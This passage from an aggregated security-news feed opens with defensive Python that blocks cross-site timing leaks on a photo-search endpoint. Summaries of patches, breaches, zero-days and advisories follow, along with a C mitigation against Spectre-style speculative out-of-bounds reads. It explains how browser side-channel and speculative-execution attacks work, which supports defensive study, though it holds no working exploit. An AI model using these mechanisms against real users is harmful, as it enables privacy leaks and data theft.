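    """Allow same-origin/same-site and user-initiated requests; refuse cross-site
    loads that an attacker page could embed (<link>, <img>, <iframe>, fetch()) and time."""
    site = headers.get("Sec-Fetch-Site")
    if site is None:
        # Browser without Fetch Metadata support: cannot classify, so this policy lets
        # the request through and relies on other controls such as SameSite cookies.
        return True
    if site in ("same-origin", "same-site", "none"):
        return True   # "none" = user-initiated, e.g. typed URL or bookmark
    # Cross-site: only a top-level GET navigation (a link click) is acceptable; it ends
    # the attacker's page rather than running silently inside it.
    return (method == "GET"
            and headers.get("Sec-Fetch-Mode") == "navigate"
            and headers.get("Sec-Fetch-Dest") == "document")


def handle_search(method, headers, query):
    """Endpoint handler: isolation check first, search only for permitted callers.
    Returns (status, body)."""
    if not is_allowed_request(method, headers):
        # Rejected before any search runs, so response time carries no result signal.
        return 403, {"error": "cross-site request refused"}
    return 200, {"results": PHOTO_INDEX.get(query, [])}


# Constructed requests: the <link>-tag load from the attack, a same-origin XHR from the
# app itself, a cross-site link click, and a legacy browser sending no Fetch Metadata.
CROSS_SITE_LINK = {"Sec-Fetch-Site": "cross-site", "Sec-Fetch-Mode": "no-cors",
                   "Sec-Fetch-Dest": "style"}
SAME_ORIGIN_XHR = {"Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors",
                   "Sec-Fetch-Dest": "empty"}
CROSS_SITE_NAV = {"Sec-Fetch-Site": "cross-site", "Sec-Fetch-Mode": "navigate",
                  "Sec-Fetch-Dest": "document"}
LEGACY_BROWSER = {}

if __name__ == "__main__":
    q = "photos of me from Iceland"
    for name, hdrs in [("link tag", CROSS_SITE_LINK), ("same-origin xhr", SAME_ORIGIN_XHR),
                       ("cross-site nav", CROSS_SITE_NAV), ("legacy", LEGACY_BROWSER)]:
        print(name, handle_search("GET", hdrs, q))
```

The check removes the attacker's ability to have the victim's browser run the search cross-site; it does not remove the timing difference between empty and non-empty results, which is why it should sit in front of the search code rather than behind it. SameSite cookies are the complementary control for browsers that do not send Fetch Metadata.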

You can see below the timing function I implemented for my proof of concept:

Below is the code I used to demonstrate how users’ location history can be extracted.

Closing Thoughts

As I said in my previous blog post, it is my opinion that browser-based side-channel attacks are still overlooked. While big players like Google and Facebook are catching up, most of the industry is still unaware.

I recently joined an effort to document those attacks and vulnerable DOM APIs. You can find more information on the xsleaks repository (currently still under construction).

As a researcher, it was a privilege to contribute to protecting the privacy of the Google Photos user community, as we continuously do for our own Imperva customers.

***

Imperva is hosting a live webinar with Forrester Research on Wednesday March 27 1 PM PT on the topic, “Five Best Practices for Application Defense in Depth.” Join Terry Ray, Imperva SVP and Imperva Fellow, Kunal Anand, Imperva CTO, and Forrester principal analyst Amy DeMartine as they discuss how the right multi-layered defense strategy bolstered by real-time visibility to help security analysts distinguish real threats from noise can provide true protection for enterprises. Sign up to watch and ask questions live or see the recording!

The post Now-Patched Google Photos Vulnerability Let Hackers Track Your Friends and Location History appeared first on Blog.

PuTTY Releases Important Software Update to Patch 8 High-Severity Flaws

The popular SSH client program PuTTY has released the latest version of its software that includes security patches for 8 high-severity security vulnerabilities. PuTTY is one of the most popular and widely used open-source client-side programs that allows users to remotely access computers over SSH, Telnet, and Rlogin network protocols. Almost 20 months after releasing the last version of

New Hacking Method Extracts BitLocker Encryption Keys

A researcher has found a new attack method that can extract BitLocker encryption keys. As a result, the attack puts

New Hacking Method Extracts BitLocker Encryption Keys on Latest Hacking News.

Denial of Service vulnerability discovered in Triconex TriStation Software Suite Emulator

Applied Risk ICS Security Consultant Tom Westenberg discovered a DoS vulnerability in an emulated version of the Triconex TriStation Software Suite. Triconex is a Schneider Electric brand which supplies systems and products in regards to critical control and industrial safety-shutdown technology. The Triconex Emulator is software that allows users to emulate and execute TriStation 1131 applications without connecting to a Tricon, Trident, or Tri-GP controller. Using the Emulator, users can test applications in an offline … More

The post Denial of Service vulnerability discovered in Triconex TriStation Software Suite Emulator appeared first on Help Net Security.

Libssh Releases Update to Patch 9 New Security Vulnerabilities

Libssh2, a popular open source client-side C library implementing the SSHv2 protocol, has released the latest version of its software to patch a total of nine security vulnerabilities. The Libssh2 library is available for all major distributors of the Linux operating systems, including Ubuntu, Red Hat, Debian, and also comes bundled within some distributions and software as a default library

39% of Counter Strike 1.6 Servers Found to be Delivering Malware

It has been roughly two decades since the launch of Counter Strike. Yet, the game continues to be popular among

39% of Counter Strike 1.6 Servers Found to be Delivering Malware on Latest Hacking News.

Hackers are using 19-year-old WinRAR bug to install nasty malware

By Waqas

By using the bug, hackers are desperately dropping persistent malware through generic trojan on systems using the old version of WinRar. McAfee security firm’s researcher Craig Schmugar has identified that the world famous and commonly used compression software WinRar is plagued with code execution vulnerability for the past nineteen years. Resultantly, over 100 exploits have surfaced that […]

This is a post from HackRead.com Read the original post: Hackers are using 19-year-old WinRAR bug to install nasty malware

Adobe March Patch Tuesday Brings Fixes For Photoshop And Digital Editions Bugs

Adobe has released the scheduled monthly update bundle for its products. This Adobe March Patch Tuesday addressed critical vulnerabilities in

Adobe March Patch Tuesday Brings Fixes For Photoshop And Digital Editions Bugs on Latest Hacking News.

Patched WinRAR Bug Still Under Active Attack—Thanks to No Auto-Updates

Various cyber criminal groups and individual hackers are still exploiting a recently patched critical code execution vulnerability in WinRAR, a popular Windows file compression application with 500 million users worldwide. Why? Because the WinRAR software doesn't have an auto-update feature, which, unfortunately, leaves millions of its users vulnerable to cyber attacks. The critical

Microsoft March Patch Tuesday Addressed Multiple Flaws And Two Zero-Day Bugs

The scheduled Microsoft March Patch Tuesday update bundle has rolled-out. This update bundle also addresses numerous security flaws. In addition,

Microsoft March Patch Tuesday Addressed Multiple Flaws And Two Zero-Day Bugs on Latest Hacking News.

Online training site says it is spamming insecure printers with adverts

Online training site Skillbox says that it has come up with an imaginative way to reach out to potential clients, and invite them to change their careers from being accountants and become graphical designers instead.

The Russian firm’s idea? To send a spam message to thousands of printers left open to the internet.

Is this really happening again?

Pakistani Govt’s passport application tracking site hacked with Scanbox framework

By Waqas

Hackers are after anyone seeking Pakistani passport while there is no response from the website’s administrator. Researchers at information security firm Trustwave have made a startling new discovery about data breach on a Pakistani government website involving the Scanbox Framework. It is worth noting that the Scanbox is a dangerous payload and this is the […]

This is a post from HackRead.com Read the original post: Pakistani Govt’s passport application tracking site hacked with Scanbox framework

What you need to know for Patch Tuesday, March 2019

By SophosLabs Offensive Security Research Microsoft released their monthly security updates for March this past Tuesday. This month’s fixes address 64 vulnerabilities that affect Windows and a range of software that runs on Windows, mainly the Internet Explorer and Edge browsers. In addition, there was a patch released for one critical vulnerability in Adobe Flash. […]

Understanding Vulnerability Scoring to Help Measure Risk

Understanding vulnerability scoring can be a daunting task, but a good starting point is first understanding risk and being able to distinguish risk from a vulnerability. Both have been used interchangeably throughout the years. A vulnerability is some aspect of a systems functioning, configuration or architecture that makes the resource a target of potential misuse, […]

The post Understanding Vulnerability Scoring to Help Measure Risk appeared first on The State of Security.

Microsoft Releases Patches for 64 Flaws — Two Under Active Attack

It's time for another batch of "Patch Tuesday" updates from Microsoft. Microsoft today released its March 2019 software updates to address a total of 64 CVE-listed security vulnerabilities in its Windows operating systems and other products, 17 of which are rated critical, 45 important, one moderate and one low in severity. The update addresses flaws in Windows, Internet Explorer, Edge, MS

Vulnerability Spotlight: Privilege escalation bug in CleanMyMac X’s helper service


Tyler Bohan of Cisco Talos discovered this vulnerability.

Executive summary

CleanMyMac X contains a privilege escalation vulnerability in its helper service due to improper updating. The application fails to remove the vulnerable components upon upgrading to the latest version, leaving the user open to attack. CleanMyMac X is an all-in-one cleaning tool for Macs from MacPaw. The application scans through the system and user directories looking for unused and leftover files and applications.

In accordance with our coordinated disclosure policy, Cisco Talos worked with MacPaw to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

CleanMyMac X incomplete update patch privilege escalation vulnerability (TALOS-2018-0759/CVE-2019-5011)

An exploitable privilege escalation vulnerability exists in the helper service of CleanMyMac X, version 4.20, due to improper updating. The application fails to remove the vulnerable components upon upgrading to the latest version, leaving the user open to attack. A user with local access can use this vulnerability to modify the file system as root. An attacker would need local access to the machine for a successful exploit.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that version 4.20 of CleanMyMac X is affected by this vulnerability.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 48297, 48298

Multiple Adobe Sandbox Vulnerabilities Risked Integrity And Confidentiality Of Systems

One of the areas contributing to the rise of cyber attacks is the use of third-party services. While these services

Multiple Adobe Sandbox Vulnerabilities Risked Integrity And Confidentiality Of Systems on Latest Hacking News.

A week in security (March 4 – 11)

Last week, Malwarebytes Labs released its in-depth, international data privacy survey of nearly 4,000 individuals, revealing that every generation, including Millennials, cares about online privacy. We also covered a novel case of zombie email that involved a very much alive account user, delved into the typical data privacy laws a US startup might have to comply with on its journey to success, and spotlighted the Troldesh ransomware, also known as “Shade.”

Other security news

Stay safe, everyone!

The post A week in security (March 4 – 11) appeared first on Malwarebytes Labs.

Verifications.io breach: Database with 2 billion records leaked

By Waqas

Verifications.io breach is one of the largest data breaches but the good news is that it does not involve passwords. Another day, another data breach; this time the email validation service Verifications.io has leaked a humongous database containing personal and sensitive records of more than 2 billion individuals around the world. Verifications.io breach – What happened It […]

This is a post from HackRead.com Read the original post: Verifications.io breach: Database with 2 billion records leaked

Facebook Messenger vulnerability exposed your private texts

A new security flaw in the web version of Facebook Messenger could allow any website to see the names of the people with whom you have been chatting.

The security researcher Ron Masas from Imperva, an online privacy monitoring website, described the vulnerability as “Cross-Site Frame Leakage” (CSFL), a side-channel attack performed on an end user’s web browser, which was first spotted in November.

“As happens with applications I regularly use, I felt the need to understand how Facebook Messenger works,” Masas wrote in a blog post.

The flaw exploits an HTML element called 'iframe'; the technique uses it to detect whether a user is active or passive on Facebook Messenger.

“I started poking around the Messenger Web application and noticed that iFrame elements were dominating the user interface,” he continued. “The chat box, as well as the contact list, were rendered in iFrames, opening the possibility for a CSFL attack.”

"This lets an attacker reliably distinguish between the full and empty states. This could let him remotely check if the current user has chatted with a specific person or business, which would violate those users’ privacy."

'By recording the frame count data over time, I found two new ways to leak cross-origin information.

'By looking at patterns instead of a static number, I was able to leak the “state” of a cross-origin window.'

Facebook Messenger has now removed all the active iFrames from its website.

'The bug is a browser issue related to how they handle content embedded in webpages and could affect any site, not just Messenger.com,' a Facebook spokesperson told MailOnline.

'We already fixed the issue for Messenger.com last year to safeguard our users and made recommendations to browser makers to prevent this type of issue from happening.'

809 Million Records Left Exposed: How Users Can Protect Their Data

It’s no secret that technological advancements and online threats are directly proportional to each other. So now more than ever, it’s imperative that users prioritize the security of their digital presence, especially in the face of advanced malware attacks and massive data leaks. Speaking of the latter — less than two months after the Collection #1 data breach exposed 773 million email addresses, it seems we have another massive data dump in our midst. Last week, researchers discovered a 150-gigabyte database containing 809 million records exposed by the email validation firm, Verifications.io.

You may be wondering how Verifications.io had so much data left to be exposed. Most people have heard of email marketing, but very few realize that these companies often vet user email addresses to ensure their validity. Enter Verifications.io. This company serves as a way email marketing firms can outsource the extensive work involved with validating mass amounts of emails and avoid the risk of having their infrastructure blacklisted by spam filters. Verifications.io was entrusted with a lot of data provided by email marketing firms looking to streamline their processes, creating an information-heavy database.

This unusual data trove contains tons of sensitive information like names, email addresses, phone numbers, physical addresses, gender, date of birth, personal mortgage amounts, interest rates, social media accounts, and characterizations of people’s credit scores. While the data doesn’t contain Social Security Numbers or credit card information, that amount of aggregated data makes it much easier for cybercriminals to run new social engineering scams or expand their target audience. According to security researcher Troy Hunt, owner of HaveIBeenPwned, 35% of the data exposed by Verifications.io is new to his database. With that said, it was the second largest data dump added in terms of email addresses to Hunt’s website, which allows users to check whether their data has been exposed or breached.

Upon discovery, the firm was made aware of the incident. And while proper security measures were taken, users can take various steps themselves to protect their information in the event of large-scale data exposure. Check out the following tips:

  • Be vigilant when monitoring your personal and financial data. A good way to determine whether your data has been exposed or compromised is to closely monitor your online accounts. If you see anything fishy, take extra precautions by updating your privacy settings, changing your password, or using two-factor authentication.
  • Use strong, unique passwords. Make sure to use complex passwords for each of your individual accounts, and never reuse your credentials across different platforms. It’s also a good idea to update your passwords on a consistent basis to further protect your data.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post 809 Million Records Left Exposed: How Users Can Protect Their Data appeared first on McAfee Blogs.

Google Chrome zero-day: Now is the time to update and restart your browser

It’s not often that we hear about a critical vulnerability in Google Chrome, and perhaps it’s even more rare when Google’s own engineers are urging users to patch.

There are several good reasons why you need to take this new Chrome zero-day (CVE-2019-5786) seriously. For starters, we are talking about a full exploitation that escapes the sandbox and leads to remote code execution. This in itself is not an easy feat, and is usually observed only sporadically, perhaps during a Pwn2Own competition. But this time, Google is saying that this vulnerability is actively being used in the wild.

According to Clément Lecigne, the person from Google’s Threat Analysis Group who discovered the attack, there is another zero-day that exists in Microsoft Windows (yet to be patched), suggesting the two could be chained up for even greater damage.

If you are running Google Chrome and its version is below 72.0.3626.121, your computer could be exploited without your knowledge. While it’s true that Chrome features an automatic update component, in order for the patch to be installed you must restart your browser.

This may not seem like a big deal but it is. Another Google engineer explains why this matters a lot, in comparison to past exploits:

Considering how many users keep Chrome and all their tabs open for days or even weeks without ever restarting the browser, the security impact is real.

Some might see a bit of irony with this latest zero-day considering Google’s move to ban third-party software injections. Many security programs, including Malwarebytes, need to hook into processes, such as the browser and common Office applications, in order to detect and block exploits from happening. However, we cannot say for sure whether or not this could prevent the vulnerability from being exploited, since few details have been shared yet.

In the meantime, if you haven’t done so yet, you should update and relaunch Chrome; and don’t worry about your tabs, they will come right back.

The post Google Chrome zero-day: Now is the time to update and restart your browser appeared first on Malwarebytes Labs.

Cyber Security Week in Review (March 8)

Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week

  • Chinese tech company Huawei is suing the U.S. government. The company alleges that the federal government violated the Constitution when it banned government agencies from buying Huawei software. The two sides have been locked in a war of words over the past year as U.S. officials raise allegations of spying and security concerns against Huawei.
  • Cisco disclosed 23 vulnerabilities affecting the NX-OS software that could put some switches at risk. The most critical vulnerability, which received a CVSS score of 8.6, lies in the Lightweight Directory Access Protocol (LDAP) in Cisco FXOS and NX-OS. An attacker could exploit this bug to gain the ability to restart the device, resulting in a denial of service. Snort rules 49334 - 49336 and 49350 can protect you from these vulnerabilities.
  • The National Security Agency released its reverse-engineering tool, Ghidra, to the public. At the RSA security conference, the agency made the software open source. While there are many reverse-engineering tools on the market, the NSA has spent years refining Ghidra and it’s largely believed to be one of the most sophisticated decompilers available.

From Talos

  • Information security and operational security teams need to work together to protect IoT. That was the main takeaway from Cisco’s keynote at the RSA conference earlier this week. Matt Watchinski, the vice president of Cisco Talos, and Liz Centoni, the head of Cisco’s internet-of-things business group, said that IoT devices have become so entrenched in our society that it’s become more important now than ever to secure them. You can watch a replay of the address here.
  • There are three vulnerabilities in Pixar Renderman that could allow an attacker to elevate their privileges to root. Renderman is a rendering application used in animation and film production produced by Pixar, a well-known film studio. When installing the application, a helper tool is installed and launched as root. This service continues to listen even after installation is complete. These vulnerabilities lie in the `Dispatch` function of this helper tool.

Malware roundup

  • A new, layered malware has popped up on the popular Pirate Bay torrenting website. Known as PirateMatryoshka, the trojan disguises itself as a legitimate torrent. Once downloaded, it has numerous layers to it and acts as a downloader to several other malicious programs. 
  • A relatively unknown threat group known as “Whitefly” is allegedly behind an attack on Singapore’s health care database. Security researchers say the group was behind the exposure of 1.5 million patients’ records in July, most likely using DLL load-order attacks.
  • “Scarlett Widow,” a hacking group believed to be based out of Nigeria, recently started a new wave of attacks. The actor has sent several malicious to K-12 schools and non-profits, including the Boy Scouts of America. So far the group is believed to have information on 30,000 individuals from 13,000 organizations across 13 different countries. 

The rest of the news

  • More than 300 million private messages in China were exposed on the internet. It is widely believed that the messages, which were transmitted on secure messaging apps, had been collected by the Chinese government. The database made personal identities searchable by anyone who found the IP address. 
  • U.S. Cyber Command carried out an offensive operation against a Russian troll farm last year. The attack targeted hacking groups known for spreading misinformation, specifically trying to shut them down on the day of the 2018 midterm elections in the U.S.
  • A new Senate report says Equifax neglected proper cybersecurity practices for years. The credit reporting agency was the victim of a massive cyber attack in 2017 that led to the exposure of 145 million Americans’ personal information. The report states that the attack could have been avoided had the company followed “widely agreed upon” cybersecurity practices. 


Vulnerabilities in Two Smart Car Alarm Systems Affected 3M Vehicles

Two smart car alarm systems suffered from critical security vulnerabilities that affected upwards of three million vehicles globally. Researchers at Pen Test Partners independently assessed the security of products developed by Viper and Pandora, two of the world’s largest and most well-known vendors of smart car alarms. With both systems, they found insecure direct object […]

The post Vulnerabilities in Two Smart Car Alarm Systems Affected 3M Vehicles appeared first on The State of Security.

Smashing Security #118: The ‘s’ in IoT stands for security


Twerking robot assistants, an app from Saudi Arabia that lets men track women, and a gnarly skiing security snarl-up!

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by technology journalist Geoff White.

New Google Chrome Zero-Day Vulnerability Found Actively Exploited in the Wild

You must update your Google Chrome immediately to the latest version of the web browsing application. Security researcher Clement Lecigne of Google's Threat Analysis Group discovered and reported a high severity vulnerability in Chrome late last month that could allow remote attackers to execute arbitrary code and take full control of the computers. The vulnerability, assigned as

Five Easy Steps to Keep on Your Organization’s DevOps Security Checklist

The discovery of a significant container-based (runc) exploit sent shudders across the Internet. Exploitation of CVE-2019-5736 can be achieved with “minimal user interaction”; it subsequently allows attackers to gain root-level code execution on the host. Scary, to be sure. Scarier, however, is that the minimal user interaction was made easier by failure to follow a […]

The post Five Easy Steps to Keep on Your Organization’s DevOps Security Checklist appeared first on The State of Security.

Tripwire Patch Priority Index for February 2019

Tripwire’s February 2019 Patch Priority Index (PPI) brings together the top vulnerabilities from Microsoft and Adobe. First on the patch priority list this month are patches for Microsoft’s Browser and Scripting Engine. These patches resolve 23 vulnerabilities, including fixes for Memory Corruption, Elevation of Privilege, Spoofing, Security Feature Bypass and Information Disclosure vulnerabilities. Next on […]

The post Tripwire Patch Priority Index for February 2019 appeared first on The State of Security.

Spectre, Google, and the Universal Read Gadget

Spectre, a seemingly never-ending menace to processors, is back in the limelight once again thanks to the Universal Read Gadget. First seen at the start of 2018, Spectre emerged alongside Meltdown as a major potential threat to people’s system security.

Meltdown and Spectre

Meltdown targeted Intel processors and required a malicious process running on the system to interact with it. Spectre could be launched from browsers via a script. As these threats were targeting hardware flaws in the CPU, they were difficult to address and required BIOS updates and some other things to ensure a safe online experience. As per our original blog:

The core issue stems from a design flaw that allows attackers access to memory contents from any device, be it desktop, smart phone, or cloud server, exposing passwords and other sensitive data. The flaw in question is tied to what is called speculative execution, which happens when a processor guesses the next operations to perform based on previously cached iterations.

The Meltdown variant only impacts Intel CPUs, whereas the second set of Spectre variants impacts all vendors of CPUs with support of speculative execution. This includes most CPUs produced during the last 15 years from Intel, AMD, ARM, and IBM.

This is not a great situation for everyone to suddenly find themselves in. Manufacturers were caught on the back foot, and customers rightly demanded a solution.

If this is the part where you’re thinking, “What caused this again?” then you’re in luck.

Speculative patching woes

The issues came from something called “speculative execution.” As we said in this follow-up blog about patching difficulties:

Speculative execution is an effective optimization technique used by most modern processors to determine where code is likely to go next. Hence, when it encounters a conditional branch instruction, the processor makes a guess for which branch might be executed based on the previous branches’ processing history. It then speculatively executes instructions until the original condition is known to be true or false. If the latter, the pending instructions are abandoned, and the processor reloads its state based on what it determines to be the correct execution path.

The issue with this behaviour and the way it’s currently implemented in numerous chips is that when the processor makes a wrong guess, it has already speculatively executed a few instructions. These are saved in cache, even if they are from the invalid branch. Spectre and Meltdown take advantage of this situation by comparing the loading time of two variables, determining if one has been loaded during the speculative execution, and deducing its value.

Four variants existed across Spectre and Meltdown, with Intel, IBM, ARM, and AMD being snagged by Spectre and “just” Intel being caught up by Meltdown.

The vulnerabilities impacting CPUs (central processing units) made it a tricky thing to fix. Software alterations could cause performance snags, and hardware fixes could be even more complicated. A working group was formed to try and thrash out the incredibly complicated details of how this issue would be tackled.

In January 2018, researchers stressed the only real way to solve Spectre was redesigning computer hardware from the ground up. This is no easy task. Replace everything, or suffer the possible performance hit from any software fixes. Fairly complex patching nightmares abound, with operating systems, pre/post Skylake CPUs, and more needing tweaks or wholesale changes.

Additional complications

It wasn’t long before scams started capitalising on the rush to patch. Now people suddenly had to deal with unrelated fakes, malware, and phishes on top of actual Meltdown/Spectre threats.

Alongside the previously mentioned scams, fake websites started to pop up, too. Typically they claimed to be official government portals, or plain old download sites offering up a fix. They might also make use of SSL, because displaying a padlock is now a common trick of phishers. That’s a false sense of security—just because there’s a padlock, doesn’t mean it’s a safe site. All it means is the data on it is encrypted. Beyond that, you’re on your own.

The site in our example offered up a zipfile. Contained within was SmokeLoader, well known for attempting to grab additional malicious downloads.

SmokeLoader


Eventually, the furore died down and people slowly forgot about Spectre. It’d pop up again in occasional news articles, but for the most part, people treated it as out of sight, out of mind.

Which brings us to last week’s news.

Spectre: What happened now?

What happened now is a reiteration of the “it’s not safe yet” message. The threat is mostly the same, and a lot of people may not need to worry about this. However, as The Register notes, the problem hasn’t gone away and some developers will need to keep it in mind.

Google has released a paper titled, unsurprisingly enough, “Spectre is here to stay: An analysis of side-channels and speculative execution.”

The Google paper

First things first: it’s complicated, and you can read the full paper [PDF] here.

There are a lot of moving parts to this, and frankly nobody should be expected to understand everything in it unless they’re working in or around this area in some capacity. Some of this has already been mentioned, but that was about 700 words ago, so a short recap may be handy:

  1. Side channels are bad. Your computer may be doing a bunch of secure tasks, keeping your data safe. All those bits and pieces of hardware, however, are doing all sorts of things to make those secure processes happen. Side channel attacks come at the otherwise secure data from another angle, in the realm of the mechanical. Sound, power consumption, timing between events, electromagnetic leaks, cameras, and more. All of these provide a means for a clever attacker to exploit this leaky side channel and grab data you’d rather they didn’t.
  2. They do this in Spectre’s case by exploiting speculative execution. Modern processors make extensive use of speculative execution: it improves performance by guessing what a program will do next and abandoning the work if that guess turns out to be wrong. Conversely, the retained paths are committed and everything gets a nice speed boost. Those potential future paths are where Spectre comes in.
  3. As the paper says, “computations that should never have happened…allow for information to be leaked” via Spectre. It allows the attacker to inject “dangerously speculative behaviour” into trusted code, or untrusted code typically subjected to safety checks. Both are done through triggering “ordinarily impossible computations” through specific manipulations of the processor’s shared micro-architectural states.

Everything is a bit speed versus security, and security lost out. The manufacturers realised too late that the speed/security tradeoff came with a hefty security price the moment Spectre arrived on the scene. Thinking bad actors couldn’t tamper with speculative execution—or worse, not considering this in the first place—has turned out to be a bit of a disaster.

The paper goes on to list that Intel, ARM, AMD, MIPS, IBM, and Oracle have all reported being affected. It’s also clear that:

Our paper shows these leaks are not only design flaws, but are in fact foundational, at the very base of theoretical computation.

This isn’t great. Nor is the fact that they estimate it’s probably more widely distributed than any security flaw in history, affecting “billions of CPUs in production across all device classes.”

Spectre: no exorcism due

The research paper asserts that Spectre is going to be around for a long time. Software-based techniques to ward off the threat will never quite remove the issue. They may ward off the threat but add a performance cost, with more layers of defence potentially making things too much of a drag to consider them beneficial.

The fixes end up being a mixed bag of trade-offs and performance hits, and Spectre is so variable and evasive that it quickly becomes impossible to pin down a 100 percent satisfactory solution. At this point, Google’s “Universal Read Gadget” wades in and makes everything worse.
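The article’s description of speculative execution above, and its point that software mitigations trade performance for safety, can be made concrete with one such mitigation: clamping an array index with a branchless mask so that even a mispredicted bounds check cannot speculatively load outside the array. This is an added example written for this page, not code from Malwarebytes or from Google’s paper; it follows the shape of the Linux kernel’s array_index_nospec() mask, assumes a GCC/Clang toolchain (arithmetic right shift on signed values, inline asm barrier), and the lookup table is constructed.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/*
 * Returns all-ones when index < size and 0 otherwise, using only
 * arithmetic, so there is no conditional branch for the processor to
 * mispredict. Derivation: when index < size, both index and
 * (size - 1 - index) have their top bit clear, so the OR has a clear
 * top bit, its complement has the top bit set, and the arithmetic
 * shift smears that bit across the word. When index >= size,
 * (size - 1 - index) wraps around and sets the top bit, and the same
 * chain yields 0. Assumes index and size are both below 2^63, as the
 * kernel's array_index_nospec() does.
 */
static inline uint64_t index_mask_nospec(uint64_t index, uint64_t size)
{
#if defined(__GNUC__)
    /* Compiler barrier: stop the optimiser from deleting the mask on the
     * grounds that the architectural bounds check already holds.
     * Speculation does not honour that check. */
    __asm__ __volatile__("" : "+r"(index));
#endif
    return (uint64_t)(~(int64_t)(index | (size - 1u - index)) >> 63);
}

/* Clamp i to 0 whenever it is out of range; identity otherwise. */
uint64_t clamp_index_nospec(uint64_t i, uint64_t size)
{
    return i & index_mask_nospec(i, size);
}

/* Constructed example table (no secrets; values chosen for testing). */
#define TABLE_SIZE 8
static const uint8_t table[TABLE_SIZE] = {10, 20, 30, 40, 50, 60, 70, 80};

/*
 * Unmitigated form. The `if` protects the architectural result, but a
 * mispredicted branch can still speculatively execute table[i] for an i
 * past the end, leaving a cache footprint that a timing side channel
 * can observe.
 */
int lookup_plain(uint64_t i)
{
    if (i < TABLE_SIZE)
        return table[i];
    return -1;
}

/*
 * Mitigated form. The index fed to the load is masked to 0 whenever it
 * is out of range, so the speculative path is confined to the table.
 * The cost is a few extra ALU instructions on every access, which is
 * the performance trade-off the article describes.
 */
int lookup_nospec(uint64_t i)
{
    if (i < TABLE_SIZE) {
        uint64_t safe = clamp_index_nospec(i, TABLE_SIZE);
        return table[safe];
    }
    return -1;
}

int main(void)
{
    uint64_t probes[] = {0, 3, 7, 8, 1000, UINT64_MAX};
    for (size_t k = 0; k < sizeof(probes) / sizeof(probes[0]); k++) {
        uint64_t i = probes[k];
        printf("i=%llu mask=0x%016llx clamped=%llu plain=%d nospec=%d\n",
               (unsigned long long)i,
               (unsigned long long)index_mask_nospec(i, TABLE_SIZE),
               (unsigned long long)clamp_index_nospec(i, TABLE_SIZE),
               lookup_plain(i), lookup_nospec(i));
    }
    return 0;
}
```

Architecturally the two lookups return identical results; the difference is only visible on the speculative path, which is why compilers and kernels apply this pattern selectively to indices that come from untrusted input.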

What is the Universal Read Gadget?

A way to read data without permission that is, for all intents and purposes, unstoppable. When code in current languages runs on a CPU with these speculative vulnerabilities, their combination allows construction of said read gadget, and that’s the real meat of Google’s research. Nobody is going to ditch speculative execution anytime soon, and nobody is going to magically come up with a way to solve the side channel issue, much less something like a Universal Read Gadget.

As the paper states,

We now believe that speculative vulnerabilities on today’s hardware defeat all language-enforced confidentiality with no known comprehensive software mitigations…as we have discovered that untrusted code can construct a universal read gadget to read all memory in the same address space through side-channels.

On the other hand, it’s clear we shouldn’t start panicking. It sounds bad, and it is bad, but it’s unlikely anyone is exploiting you using these techniques. Of course, unlikely doesn’t mean unfeasible, and this is why hardware and software organisations continue to wrestle with this particular genie.

The research paper stresses that the URG is very difficult to pull off.

The universal read gadget is not necessarily a straightforward construction. It requires detailed knowledge of the μ-architectural characteristics of the CPU and knowledge of the language implementation, whether that be a static compiler or a virtual machine. Additionally, the gadget might have particularly unusual performance and concurrency characteristics.

Numerous scenarios will require different approaches, and it lists multiple instances where the gadget will potentially fail. In short, nobody is going to come along and Universal Read Gadget your computer. For now, much of this is at the theoretical stage. That doesn’t mean tech giants are becoming complacent however, and hardware and software organisations have a long road ahead to finally lay this spectre to rest.

The post Spectre, Google, and the Universal Read Gadget appeared first on Malwarebytes Labs.

Cyber Security Week in Review (March 1)


Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week


  • Drupal patched a “highly critical” vulnerability that attackers exploited to deliver cryptocurrency miners and other malware. Some field types in the content management system did not properly sanitize data from non-form sources, which allowed an attacker to execute arbitrary PHP code. Users need to update to the latest version of Drupal to patch the bug. Snort rule 49257 also protects users from this vulnerability.
  • Cryptocurrency mining tool Coinhive says it’s shutting down, but not due to malicious use. Attackers have exploited the tool for months as part of malware campaigns, stealing computing power from users to mine cryptocurrencies. However, the company behind the miner says it’s shutting down because it’s no longer economically viable to run. Snort rules 44692, 44693, 45949 - 45952, 46365 - 46367, 46393, 46394 and 47253 can protect you against the use of Coinhive. 
  • Several popular apps unknowingly share users’ personal information with Facebook. In many cases, this can include personal health information, including women’s menstrual cycles, users’ heart rates and recent home purchases. The data is sent to Facebook even if the user doesn’t have a Facebook profile.

From Talos


  • Attackers are increasingly going after unsecured Elasticsearch clusters. These attackers are targeting clusters using versions 1.4.2 and lower, and are leveraging old vulnerabilities to pass scripts to search queries and drop the attacker's payloads. These scripts are being leveraged to drop both malware and cryptocurrency miners on victim machines.
  • The latest Beers with Talos podcast covers the importance of privacy. Special guest Michelle Dennedy, Cisco’s chief privacy officer, talks about recent initiatives the company is taking on and how other organizations can do better. 

Vulnerability roundup


  • A flaw in the Ring doorbell could allow an attacker to spy on users’ homes and even inject falsified video. The vulnerability could open the door for a man-in-the-middle attack against the smart doorbell app since the sound and video recorded by the doorbell is transmitted in plaintext. 
  • Cisco disclosed multiple vulnerabilities in a variety of its products, including severe bugs in routers. The company urged users of its firewall routers and VPN to patch immediately Thursday, warning against a remote code execution vulnerability. There’s also a certificate validation vulnerability in Cisco Prime Infrastructure that could allow an attacker to perform a man-in-the-middle attack against the SSL tunnel between Cisco’s Identity Service Engine and Prime Infrastructure. Snort rule 49240 protects users from the Prime Infrastructure vulnerability. 
  • New flaws in 4G and 5G could allow attackers to track users’ location and intercept phone calls. A new research paper discloses what is believed to be the first vulnerabilities that affect both broadband technologies. 

